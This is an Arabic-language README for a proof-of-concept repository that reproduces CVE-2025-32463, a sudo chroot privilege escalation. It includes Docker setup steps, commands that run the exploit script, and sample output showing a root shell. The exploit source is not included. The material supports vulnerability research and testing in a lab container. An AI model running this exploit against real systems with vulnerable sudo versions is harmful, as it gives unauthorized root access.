
يوفر هذا المستودع بيئة بسيطة وقابلة لإعادة الإنتاج لإظهار ثغرة تصعيد الامتيازات CVE‑2025‑32463 في ميزة chroot في sudo.
| الملف | الغرض |
|---|---|
| Dockerfile | ينشئ صورة Ubuntu 24.04 مع sudo 1.9.16p2 المعرض للثغرة وأدوات البناء |
| sudo‑chwoot.sh | استغلال إثبات المفهوم الذي يفتح شل جذر داخل chroot |
| run.sh | نص برمجي مساعد يبني الصورة (إذا لزم الأمر) ويشغّل حاوية الاستغلال |
البنى المعرضة للثغرة من sudo 1.9.14 حتى 1.9.17 (جميع مراجعات p) على معظم توزيعات لينكس متأثرة.
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
يُمرر run.sh الخيارين --privileged و--rm إلى Docker كي تنظف الحاوية نفسها عند خروجك.
أزل الصورة عندما تنتهي:
docker rmi sudo-chwoot